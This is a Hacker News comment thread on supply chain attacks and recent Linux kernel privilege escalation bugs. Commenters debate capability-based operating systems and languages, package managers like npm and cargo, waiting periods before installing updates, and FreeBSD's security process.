    • mike_hearn a day ago

      Capabilities have a lot of serious design problems which is why no mainstream language has them. Because this comes up so often on HN I wrote an essay explaining the issues here:

      https://blog.plan99.net/why-not-capability-languages-a8e6cbd...

      But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.

      The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.

      • josephg 21 hours ago

        > I wrote an essay explaining the issues here

        This essay only addresses my second point - capabilities within a program. It doesn't address OS level capabilities at all.

        But even in the space of programming languages, I find this essay extremely unconvincing. Like, you raise points like this:

        > Here are some problems you’ll have to solve in order to sandbox libraries: What is your threat model? How do you stop components tampering with each other’s memory?

        The threat model is left pad cryptolockering your computer via a supply chain attack. The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.

        You stop components tampering with each others' memory by using a memory safe language.

        > its main() method must be given a “god object” exposing all the ambient authorities the app begins with

        So what? The main function already takes arguments. I don't understand the problem.

        Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.

        Then there's these weird claims:

        > Any mutable global variable is a problem as it may allow one component to violate expectations held by another.

        You don't need to ban mutable global variables! Lets imagine we did this in safe rust. I think the only constraint is that a global variable can't be shared over the boundary between crates. But - nobody does that anyway. Even if you did share a global over a crate boundary, the child crate would still only be able to access it through methods on the type.

        Sneaky developers could leverage globals to violate the security boundary. But it would be hard to do by accident. Maybe just, don't do that.

        Your essay talks about some research project making a capability based java subset. And I understand that the resulting ergonomics weren't very good. But that isn't evidence that capabilities themselves are a bad idea. If a research student wrote a half baked C compiler one time, you wouldn't take that as evidence that C compilers are a bad idea. I do, however, accept that the burden of proof is on me to demonstrate that its a good idea. I hope that I can some day rise to that challenge.

        > The filesystem is a trusted entity on any OS design I'm familiar with

        Thats not how capability based microkernels like SeL4 work. The filesystem is owned by a specialised process. Other processes only modify files by sending messages to the filesystem process via a capability handle. If nobody created a writable file handle, the file can't be arbitrarily mutated by another module. Copyfail happened because in linux, any code can by default interact with the page table. One piece of code was missing access control checks. In capability based systems, its basically impossible to accidentally forget access control checks like that.

        > The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.

        Copyfail is a logic bug. C#, Java or Kotlin wouldn't save you from it at all.

        • mike_hearn 20 hours ago

          The article talks about OS capabilities in the second part when it discusses Mojo, which is based on IPC.

          > The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.

          That requirement may seem clear right now, but the moment you talk to other people about your language you'll find there's no agreement on what "get hacked" means. Some people will consider calling exit(0) repeatedly to be "hacked" because it's a DoS attack, others will say no code execution or priv escalation happened, so that's not being hacked. Some will say that left-pad being able to read arbitrary bytes from your address space is being hacked, others will say no harm done and thus it wasn't being hacked. The details matter and you need to nail them down in advance.

          It turns out for example that one of the top uses of the Java SecurityManager was just to stop plugins accidentally calling System.exit() and tearing down the whole process. It wasn't even a security goal, really.

          > You stop components tampering with each others' memory by using a memory safe language.

          That's not enough. See languages like Ruby or JavaScript, which are memory safe but not sandboxable due to all the monkeypatching they allow.

          > Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.

          But almost nobody uses Haskell, partly because of poor ergonomics like this! So if you want a language that gets wide usage and has a good library ecosystem, monads for everything probably isn't going to take off.

          > If nobody created a writable file handle, the file can't be arbitrarily mutated by another module.

          We're talking about critical bugs in the filesystem so what the FS processes idea of a file handle is doesn't really matter. If you can confuse or buffer overflow the FS process by sending it messages, you can then edit state inside that process you weren't supposed to be able to access, and as that process controls the security system for everything it's game over. Microkernels have no way to stop this, which is one reason very few operating systems move the core FS out into a separate process. You can't easily survive a crash of the core FS code, and it being exploited is equivalent to an exploit of the core microkernel anyway in terms of adversarial goals. So you might as well just run it in-kernel and reap the performance benefits.

          • tome 20 hours ago

            > > Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.

            > But almost nobody uses Haskell

            Sad, but true

            > partly because of poor ergonomics like this!

            I'm somewhat dubious that's the reason, partly because I find such ergonomic excellent! Especially those provided by my capability system Bluefin: https://hackage.haskell.org/package/bluefin

          • josephg 11 hours ago

            > We're talking about critical bugs in the filesystem so what the FS processes idea of a file handle is doesn't really matter.

            The copyfail bug wasn’t a bug in the filesystem code. It was a bug in the crypto algorithm code, which wrote to the filesystem page table without checking if the process invoking it had permission to write to the passed file handle. In a monolithic kernel like Linux, every subsystem can access the memory of every other subsystem by default. It’s up to each subsystem to be careful. As we keep discovering, “be really careful” is not a successful security strategy.

            A capability based OS like SeL4 is more secure. With SeL4, you would put the crypto algorithms and filesystem in separate user space processes. These processes would only communicate by RPC, by invoking capabilities. We can imagine how the copyfail scenario would play out: A user process has a capability representing its (read only) access to some privileged file on disk. It passes that capability to the crypto algorithm process. A bug - or even complete takeover - of the crypto algorithm process still doesn’t change that the file cap is read only. The crypto algorithm process doesn’t have direct access to the memory representing that file. It only has the read only file handle. All it can do with that handle is invoke it, which will only give it read access. Even with a bug in the crypto algorithms process, the OS would stay secure.

            Yes, capability OSes aren't a magic bullet. A bug in the filesystem process could still result in filesystem corruption. But better is better. OS capabilities provide defence in depth. They would have prevented copyfail.

            As far as I can tell, your argument against capabilities is that they might be slow. Some implementations have poor ergonomics. They don’t magically solve every possible security bug. You also, personally, used a bad implementation of capabilities this one time years ago in Java. Is that accurate?

            You must see how unconvincing I find your argument. What are you even trying to do? Convince people to not explore different ideas in computer science? When I close my eyes I see an old man yelling: “Hey you kids! What are you doing up there, trying new things? You stop that right now!”

          • jason_oster 3 hours ago

            > If you can confuse or buffer overflow the FS process by sending it messages, you can then edit state inside that process you weren't supposed to be able to access, and as that process controls the security system for everything it's game over.

            The assumption here is that the FS is the root of trust for the kernel. (A claim I consider dubious, but what do I know about knowing things?) It's another way to say that if you don't harden your root of trust, you're SOL. Which, ok, fair enough. But that's frankly irrelevant because hardening the root of trust is table stakes. The system cannot be secured without it, regardless of the threat model.

            All of the concerns about a definition of "getting hacked" falls out of ignoring the hardening of the root of trust. I don't wish to put words in your mouth, but my interpretation of the argument is essentially, "we can't have nice things because the root of trust cannot be hardened sufficiently to prevent all intrusions."

            Iff the FS is the root of trust, and it is not possible to confuse the FS by sending it messages, then there is no game over. You have a root of trust that cannot be broken.

            > Microkernels have no way to stop this, which is one reason very few operating systems move the core FS out into a separate process.

            My reading of the history reaches a very different conclusion. First, the primary reason that very few operating systems in practice use a microkernel design is because Linus Torvalds believed it was too slow for early 90's hardware [1]. And everyone else just does whatever Linux is doing.

            Second, security through surface area reduction (and more broadly, defense-in-depth) was always the point of the microkernel design [2]. Trivially, the principle of least privilege is how one arrives at a secure system. Monolithic kernels, to this very day, continue to prove that they cannot be secured in any practical manner. I can only assume we need things to get worse before kernel developers will tighten up and take security seriously.

            > So you might as well just run it in-kernel and reap the performance benefits.

            There's that same mentality. Apparently "speed at all costs" is the willful trading of security for performance. That position is just as flawed as trading essential liberty for temporary safety [3]. It doesn't matter how fast the thing is when the slightest bump always causes it to explode, killing everyone on board.

            [1]: https://web.archive.org/web/20040210002251/http://people.flu...

            [2]: https://www.cosy.sbg.ac.at/~clausen/PVSE2006/linus-rebuttal....

            [3]: https://old.reddit.com/r/todayilearned/comments/k0c8o6/til_b...

    • theamk a day ago

      Note that capabilities would not help for those bugs we are discussing today.

      Those exploits are in kernel, and the userspace is only calling the normal, allowed calls. Removing global open()/listen()/etc.. with capability-based versions would still allow one to invoke the same kernel bugs.

      (Now, using microkernel like seL4 where the kernel drivers are isolated _would_ help, but (1) that's independent from what userspace does, you can have POSIX layer with seL4 and (2) that would be may more context switches, so a performance drop)

      • josephg a day ago

        > Note that capabilities would not help for those bugs we are discussing today.

        Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.

        Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.

        A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.

        > (2) that would be may more context switches, so a performance drop

        I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).

        But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.

        I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.

    • grebc a day ago

      Have you heard of pledge in OpenBSD?

      I prefer it’s model of declaring this is what I want to use, any calls to code outside that error out.

      • josephg a day ago

        Yes. But its nowhere near as powerful as capabilities.

        - Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.

        - Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.

        - You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.

        • grebc a day ago

          I’m not trying to say use pledge/unveil to make capabilities, I’m saying use pledge/unveil to limit exposure.

          To me it’s easier to get a program to let the system know what it needs vs. try to contain it from the outside.

          Anyway, have a good one.

          • sroerick 19 hours ago

            There's an interesting distinction here where one approach is to build sandboxes that limit exposure, while the other is just allowing the program to be more secure.

            One approach is "Trust No Code" and the other is "Trusted code should run safely".

            the first one sounds better on paper, but leads to a very complicated system. That said, I haven't worked with jails much or other forms of sandboxing. It just seems to me that to make software function you need escape hatches, and the more of those you have, well, now you're back to plugging exploits with a more complicated system.

            It was interesting to me to hear that even though OpenBSD had designed their software to limit permissions even before pledge and unveil were released - upon release they found that a shocking amount of their software actually wasn't following their own rules.

            • grebc 14 hours ago

              I definitely lean to the “trusted code should run safely” because it’s just simpler in general.

              At what point do you trust the system? And if you don’t trust any of it what are you trying to accomplish?

              Re OpenBSD: I think it just shows we’re all human(fallible) at the end of the day :)

              • josephg 9 hours ago

                > Re OpenBSD: I think it just shows we’re all human(fallible) at the end of the day :)

                Yeah. Its yet another reminder that "being really careful" isn't an adequate security policy. Attackers only need to find 1 bug. Defenders need to protect everything. In large systems, you need defence in depth. Pledge? Yeah. NX? Yeah. Process isolation between subsystems? Yeah lets have that too. Static verification? Love it. Rust's borrow checker? Sure. We need it all.

  • c7b a day ago

    My pet theory is that package managers will one day be seen like we see object-oriented programming today. As something that was once popular but that we've since grown out of. It's also a design flaw that I see in cargo/Rust. Having to import 3rd party packages with who-knows-what dependencies to do pretty much anything, from using async to parsing JSON, it's supply chain vulnerability baked into the language philosophy. npm is no better, but I'm mentioning Rust specifically because it's an otherwise security-conscious language.

    • mike_hearn a day ago

      The industry hasn't grown out of OOP. Go look at any major production codebase businesses rely on and it's fully of objects and classes, including new codebases made very recently.

      Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).

      Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.

      • c7b a day ago

        It's a condensed statement. There was a time when I would start a new programming project thinking about class hierarchies, maybe drawing some UML diagrams. I don't do that anymore, and I don't believe it's very common for greenfield projects anymore. But educate me if that's wrong. We've kept some of the good ideas from OOP like namespaces and interfaces and we use them in slightly different contexts now, where OOP may even still be technically possible, but it's not the primary way of doing things anymore. I believe, or at least hope, that we will see a similar kind of evolution for package managers. Where it's still possible to use other people's code, but having packages like left-pad or is-even is no longer how it's commonly being used, even if it may still technically be possible.

        • mike_hearn 20 hours ago

          I think that's normal, what universities teach as OOP is very different to what's actually done in the real world. But it was always that way. I learned OOP as a kid and UML didn't feature. Then at university it was taught in a very theoretical way. On the other hand things like encapsulation, inheritance etc are still widely used.

    • pjmlp a day ago

      Rust is quite bad on this, having to rely on external crates for error handling or macros is even worse than what async runtime to pick up.

      Yes, I mean crates like anyerror and syn.

      • kibwen 17 hours ago

        I'm all for including more things in the Rust standard library, but anyhow and syn are literally from a core Rust dev. It's not some left-pad rando, it's like a Linux user saying they don't trust the Git developer.

    • weregiraffe a day ago

      But you can't expect the language std to supply you with every package under the sun.

      • c7b a day ago

        I don't have an answer what the alternative is going to look like. But smarter people than me may find something. C/C++ are doing fine without package managers. Go at least has a more capable standard library than Rust. But I'm not sure if Go's import github approach is the answer.

        One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.

        • rounce a day ago

          > Go at least has a more capable standard library than Rust.

          Many Golang projects I see in the wild will import a number of dependencies with significant feature overlap with sections of the standard library, or even be intended as a replacement for them. So it seems that having an expansive stdlib isn’t sufficient to avoid deep dependency trees, it probably helps to some degree but it’s definitely not a panacea.

          • Measter a day ago

            That's not really that surprising when you think about it. Standard library-provided things are implemented on a basis of working OK for as many scenarios as possible, not on one of being the best possible implementation for every possible scenario.

        • kibwen 17 hours ago

          > C/C++ are doing fine without package managers.

          More or less the entire Debian apparatus is an organization devoted to being a C/C++ package manager, and while as an end-user it's adequate for installing applications it's still an enormous pain to use packages as libraries even with apt and friends. And once you get outside of apt, you're in an endless hellscape. People don't seem to understand that the real reason that people love Rust is not because of memory safety (let's be honest, most people are too short-sighted to care about that); it's because of Cargo.

          • skydhash 10 hours ago

            > it's still an enormous pain to use packages as libraries even with apt and friends. And once you get outside of apt, you're in an endless hellscape

            I strongly doubt that. Especially with tools like pkg-config that let you generate the set of flags for a package. If anything I've seen more horrendous build scripts from people that are trying to be clever and trying to support everything under the sun.

        • CJefferson 17 hours ago

          I think what we really need is better sandboxes languages. I’d be much happier if my compression algorithm only had an input stream and an output stream. Maybe my gui library shouldn’t have network access or filesystem access. It just draws what I give it, gives me back what users press. You could still make evil software in this world of course.

          • c7b 17 hours ago

            Sounds like functional programming could help with that?

        • uecker a day ago

          The solution exists, and those are curated package repositories as we have in Linux distributions. In C I can simply install a -dev package and use some library which sees some quality control and security updates from the distribution.

          The problem is that the UNIX shell model got very successful and is now also used on other platforms with poor package management, so all the language-level packaging system were created instead. But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.

          • kibwen 17 hours ago

            > But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.

            I recall a decade ago listening to native app developers lamenting how web pages were inferior to native apps and gnashing their teeth at why browsers wouldn't learn the lessons of native apps. It was, and remains, a shocking display of self-unawareness to fail to understand why web pages, despite doing many things worse than native apps, managed to do blow native apps out of the water when it comes to doing the things that actually matter to users. This is how it feels listening to the above comment; you have failed to reflect on why both programming language authors and programming language users were pushed to using language-specific package managers in the first place, and you have failed to put forth any improvements to OS-level package managers that would allow them to address those underlying flaws.

          • marcus_holmes 21 hours ago

            TFA is literally talking about vulnerabilities in Linux packages. There are gajillions of them. Curated package repositories are not solving this problem.

            • MSFT_Edging 18 hours ago

              I think curated package repositories solve a problem, but not all of them.

              For example, I'm not sure if the world of windows freeware ever moved past this, but very often, the home page for a freeware package will look nearly identical to a page set up to deliver malware. Every package you download you wonder "is this the legit version?". Even push it further, there were multiple examples of sites that were previously trusted for software downloads(SourceForge and the installer debacle) that began packaging spyware or adware into downloads.

              With either delivery method, you're not quite safe from supply chain attacks, but with the curated repo, you at least have a single source of packages where you can trust it 99% of the time.

            • uecker 18 hours ago

              It talks about "installing software". You should definitely install updates from your Linux distribution and installing new packages from a curated repository is certainly not worse than having software already installed. Reducing the footprint is always a good idea though. Installing software from random uncurated sources is generally risky.

        • well_ackshually a day ago

          >C/C++ are doing fine without package managers.

          They're not either, every one of these projects contains a gigantic vendor/ folder full of unmaintained libraries, modified so much that keeping up with the latest changes is impossible so they're stuck with whatever version they copied back in 2009.

          • jkercher a day ago

            You make that sound worse than it is. On the overall topic, you have 0 supply chain risk, and the whole thing is local. Also, your code from 2009 is still valid. That would be a foreign concept in some languages like Python.

            • baq a day ago

              you have your supply chain risk still, it's just frozen as of 2009 and whatever you vendored back then is as of today swiss cheese; also you'd better have the compiler suite vendored, too (as you should with this strategy).

              there's nothing stopping you from using python from 2009 except why would you want to do that to yourself - but the same strategy applies. the reference python implementation is written in C, after all.

        • pjmlp a day ago

          In C and C++'s case, the batteries included is POSIX + Khronos.

          • kibwen 17 hours ago

            In this analogy, the battery is the Leiden jar cobbled together by Benjamin Franklin in 1750. It's 2026, POSIX is unfit for purpose.

      • foresto a day ago

        A stdlib doesn't have to provide everything under the sun in order to be helpful here.

        Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.

        That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.

  • dguest a day ago

    Most people will avoid sticking things in their mouth by default. They don't wait for the microbial cultures to come back positive to say no.

    We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.

    • noduerme a day ago

      The billions of burgers served by fast food franchises with long histories of poisoning people would argue that delicious convenience overrides the hygiene instinct.

      Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.

    • xboxnolifes a day ago

      > They don't wait for the microbial cultures to come back positive to say no.

      They dont wait for the cultures to come back negative to say yes either. They just eat what they are served.

      • dguest a day ago

        Exactly! They rely heuristics like that they are being served in a clean public restaurant which is presumably following health code, and is staffed by people who follow standard norms on hygiene. In some countries the norm is for the kitchen to be visible so the patrons can take a peak themselves.

        If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food totally free, I think most people will think twice.

    • yxhuvud a day ago

      Most people start out as kids that does exactly that.

      • 1718627440 a day ago

        And kids do not decide what to buy and how to prefer that food for exactly that reason.

    • oever a day ago

      That means going back to disabling Javascript or only allowing widely used, well-maintained Javascript libraries.

      • mschuster91 a day ago

        > or only allowing widely used, well-maintained Javascript libraries.

        That isn't a guarantee either, just last month someone compromised the Axios library.

        • skydhash a day ago

          They stole the axios's npm keys and they uploaded malicious artifacts. They did not takeover the axios's repo. The issue is with packaging and distribution, not with code.

          • pocksuppet 21 hours ago

            What's the meaningful distinction between those two things? You imported axios, you got pwned. Same result either way.

            • skydhash 21 hours ago

              Because the way npm works means that as soon as a developer key got stolen, a lot of people got pwned. The key is the only barrier.

              Compare that with the average distro. You would have to compromise the developer infrastructure (repo or website) and publish a new version without them being aware while notifying the maintainer that’s its ok to merge the new package script in the distro repo. Hard to pull off in high profile projects.

  • larodi a day ago

    Indeed - one year ago we floated the idea it is better to write your code if you can, than get third parties. But it was a heresy at the time to consider LLMm filling the gaps.

    Today I’m limiting the exposure to dependencies more than ever, and particularly for things that take few hundred lines to implement. It’s a paradigm shift, no less.

    • orbital-decay a day ago

      This replaces supply chain trust with the trust in the LLM and the provider you're using. Even if you exclude model devs from your threat model and are running the LLM yourself, it's still an uninterpretable black box that is trained on the web data which can be and is manipulated precisely to attack LLMs during training. So this approach still needs proper supply chain security.

      • larodi a day ago

        Well it needs, and in particular if you use an adversarial model tuned to inject malware. Not sure if it was researched though to this degree and no provider would tell you anyways I guess :)

    • noduerme a day ago

      There are a lot of libs you really can't justify implementing from scratch. Mathjs and node-mysql jump to mind. Poisoned chains build up from small dependencies, and clearly staying on top of your dependency chain should be a full time job - if anyone was willing to pay someone to do that full time.

      • larodi a day ago

        Of course, and thank God for them. But many more look more complicated and serve more use case than you typically actually need. Like - how much of ffmpeg you need, well depends on the project. And perhaps someone is happily tearing it down with LLM to get precisely these parts (not me, though I enjoy doing it to LLMs and other models).

        But being able to have agents implement pelr5 in rust and make it faster and more secure raises many questions towards the role of open source and consequences of security and supply chain risks.

  • sergeykish a day ago

    Web pages handled by browsers. Linux desktop running code without sandbox is reckless, relied on verification by distro maintainers, does not work the moment users run proprietary software.

    Programming language packages issue only because we don't have zero trust for modules — no restrictions to open socket or file system. Issue is not count, pure function leftPad can't hurt you.

  • Animats 13 hours ago

    > The sheer mass of packages

    Yes.

    I just noticed that a Rust program I'm working on had acquired a plotter driver crate. A plotter driver? The program has no graphical output.

    Turns out that "kdtree" has a dev dependency on a profiling library that pulls in a whole graphics system. Even in release mode, I get that, because I have debug symbols turned on, which activated dev dependencies.

    Aargh.

    • endospore 13 hours ago

      > I have debug symbols turned on, which activated dev dependencies

      Nope that doesn't happen. It's not compiled into your binary if it's a dev or build dependency. Cargo may have downloaded the crate source according to the lockfile and that's it, it shouldn't build anything unneeded.

  • rerdavies a day ago

    I am feeling really uncomfortable sitting on a large React project.

    Whether to do constant npm upgrades to keep the high-priority security issues count at zero (for what seems like about 15 minutes), or whether to hang back a bit to avoid catching the big one that everyone knows is coming real soon now.

    Not enjoying npm at all.

  • JulienBrouchier 20 hours ago

    There are positive things happening too. Recently, npm released min-release-age filtering the lets you only import packages that have a certain vintage, protecting you from all these supply chain attacks as they tend to be quickly detected.

    https://github.com/npm/cli/releases/tag/v11.10.0

  • bulbar a day ago

    Realistically, most folks don't get paid to mitigate long term risks by deviation from the common (and more efficient) practice.

    Big companies have security roles on multiple levels, enforcing policies and not allowing devs to just install any package. That's not new but started maybe 15 years ago.

  • emodendroket a day ago

    Right, yeah, instead you can run ancient versions of everything and encounter a whole different class of risks

  • Joeri 17 hours ago

    Blaming the victim is too easy. NPM is unsafe at any speed. You cannot use it in any but the most trivial capacities without opening yourself up to supply chain attacks.

    Why is npm the only package ecosystem that has so many problems? What are the other package system owners doing better? Let’s start there, instead of blaming the victims.

  • amelius a day ago

    lim (num_packages_in_system -> inf) p(successful_supply_chain_attack) = 1

  • anthk 18 hours ago

    This never happened under CPAN/CTAN.

    This wasn't a nightmare wanting to happen, but an example of badly maintaned systems for the lowest common denominator.

  • chasil a day ago

    I am so happy to go through another round of kernel RPMs after the freak out today!

    I have one server that has shell users, and I did the "yum update" and "reboot -f" dance last week.

    Was that good enough? Oh no.

    Here we go again!

    • baq a day ago

      Fortunately the issue isn’t fixed yet, so you don’t have to :)

  • j45 a day ago

    Thinks might have to start considering server side technologies a bit more if at least being mindful of build processes.

    • marcus_holmes a day ago

      It's not just client-side npm though. Rust has the same problem.

      Edit: and, ofc, what we're discussing here is Linux packages.

CriticalRegion a day ago

This is a baffling take.. These exploits are local privilege escalations for linux systems. They'll allow an attacker with a foothold in a shared environment or with low privilege access to a system to affect the rest of the system. They aren't RCEs and won't let attackers access environments that they couldn't before other than the shared hosting scenarios. That is absolutely not how most supply chain attacks are carried out. Most supply chain attacks are performed via credential theft and social engineering. The more sophisticated ones are APT style attacks like the Solarwinds one (which were carried out by organisations that would already have exploits like these) or more creative stuff like the Shai-Hulud fiasco. All of these options existed before these LPEs. If you're worried about supply chain attacks you've been worried for longer than Mythos has been out. Not updating your software is never good security advice.

  • AntiUSAbah a day ago

    The supply chain attack in this case, would be injecting the exploit on a ci/cd system and escalating the local user who runs the npm code to root.

    The proper response from them and you, should be to make sure to have some isolatin between user space and root like gvisor.

  • Phelinofist a day ago

    Either my reading of your comment is wrong or you misunderstood the supply chain comment by OP I think: what they mean is that a supply chain attack that gets the exploit on a system would be great now because the reported vulns are unfixed pretty much everywhere

    • CriticalRegion a day ago

      No, you read it right. I just misunderstood the post's message as "these exploits will enable more supply chain attacks". I'll probably delete my comment since it's debating a strawman. It is absolutely right that these exploits might enable these attacks to have a larger impact. I still don't think that I agree with the message since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update.

      • Phelinofist 18 hours ago

        > since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update

        In general I agree, but I think these two vulns are 0day-y and pretty much every major distro is affected AFAIU, so there is perhaps slightly more potential than usual

  • throawayonthe a day ago

    yeah but i mean installing an npm package in a container is giving it low privilege access

  • traderj0e 16 hours ago

    Well it does say "install" new software, as in run code locally

0xbadcafebee a day ago

"Wait a week to install software" does not work. Just a few months ago a massive exploit hit the web, which was a timed attack which sat for more than a month before executing. If everyone starts waiting a week, their exploits will wait 2 weeks. Cyber criminals do not need to exploit you immediately, they just need to exploit you. (It also doesn't change a large range of vuln classes like typosquatting)

  • tom_alexander a day ago

    I think the author was suggesting "wait a week" as a one-time wait for fixes to be written and patches distributed for these specific prematurely-disclosed vulnerabilities, not an on-going suggestion for delaying all updates. But otherwise I agree with you.

  • moebrowne a day ago

    > If everyone starts waiting a week, their exploits will wait 2 weeks

    It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.

    There are lists of attacks which had an exposure window which was much shorter than 2 weeks:

    https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...

  • gpm a day ago

    I think you misunderstood the article. The proposal isn't wait a week after Software has been published before installing it. It's in the next seven days starting now, just don't, because you probably don't have patches for these vulnerabilities and even if you do there's probably more scary vulnerabilities about to be discovered.

    • hnfong a day ago

      I think it's even more specific.

      From TFA:

      > Right now would be one of the best times for a supply chain attack via NPM to hit hard.

      Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.

      This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.

  • dingocat 17 hours ago

    You're throwing the baby out with the bathwater, though. Waiting a week still prevents a decent amount of attacks. Not every attack can evade detection for two weeks. Even if it did, security scanning tools might still detect them.

    Say hypothetically that 20% of attack slip through, which is still worrying, you can mitigate 80% of attacks by just waiting a week. It's a low risk, high reward strategy.

  • Nathanba a day ago

    well then let's wait a month or even two months. The point of the wait period is primarily to avoid the new installation of exploits, not the execution of already installed exploits.

  • whazor a day ago

    A popular package has more exposure. When the artefact is published, the entire world can see it. Hopefully some people check the diff between versions. But without any delays then you could be hit by exploits nobody has seen yet.

  • chakintosh a day ago

    Yeah, Stuxnet was dormant for a year until execution.

  • fny a day ago

    This is why cooldowns have space for patches.

  • dnaaun a day ago

    Every dependency compromise that I can remember "in the past few months" were discovered in hours, if not minutes (litllm, axios, bitwarden CLI, Checkmarx docker images, Pytorch lightning, intercom/intercom-php). What's more, the discovery of these compromises did not at all rely on whether the compromises were actively used.

    That's why I don't understand:

    > If everyone starts waiting a week, their exploits will wait 2 weeks

cperciva a day ago

Alternatively, switch to an operating system like FreeBSD which doesn't take a YOLO approach to security. Security fixes don't just get tossed into the FreeBSD kernel without coordination; they go through the FreeBSD security team and we have binary updates (via FreeBSD Update, and via pkgbase for 15.0-RELEASE) published within a couple minutes of the patches hitting the src tree. (Roughly speaking, a few seconds for the "I've pushed the patches" message to go out on slack, 10-30 seconds for patches to be uploaded, and up to a minute for mirrors to sync).

  • gucci-on-fleek a day ago

    I'm somewhat skeptical here, because I notified the FreeBSD security team of a vulnerability a few years ago, and I never got a response, even after a follow-up email a few weeks later. To be fair, my report was about a non-core component, and the vulnerability wouldn't be very easy to exploit, but Debian, OpenBSD, SUSE, and Gentoo all patched it within a week [0].

    That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)

    [0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline

    • stingraycharles a day ago

      Linux Kernel doesn’t differentiate between security bugs and other bugs, which is the main complaint here I think. They have the same process.

      So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.

  • landr0id a day ago

    FreeBSD didn’t have user land ASLR until 2019 and, amongst other mitigations, still doesn’t have kASLR. It’s not a serious operating system for people who care about security. If you want FreeBSD and security take Shawn Webb’s HardenedBSD.

    • kelnos a day ago

      Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat. It's a speed bump, not a brick wall.

      I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.

      • landr0id a day ago

        >Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat.

        For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.

        >I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.

        When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.

    • abrookewood a day ago

      Is there anywhere that provides a good overview of the various OS protection technologies/approaches that exist and which OSes have implemented them?

    • user3939382 a day ago

      So you have one example in hand and trash talked FreeBSD’s entire security team. Bold claims are fine but this is lazy.

      FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0 days for it?

      • landr0id a day ago

        Ask yourself why Mythos was so easily able to develop a remote STACK buffer overflow vulnerability.

        • nozzlegear a day ago

          Define "so easily"?

          • landr0id a day ago

